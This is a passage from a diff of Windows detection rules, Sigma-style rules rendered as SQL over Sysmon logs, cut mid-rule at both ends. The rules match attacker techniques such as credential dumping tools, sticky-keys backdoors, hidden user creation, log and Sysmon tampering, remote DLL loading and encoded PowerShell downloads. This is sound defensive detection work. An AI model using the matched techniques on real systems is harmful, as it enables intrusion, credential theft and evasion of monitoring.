AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' 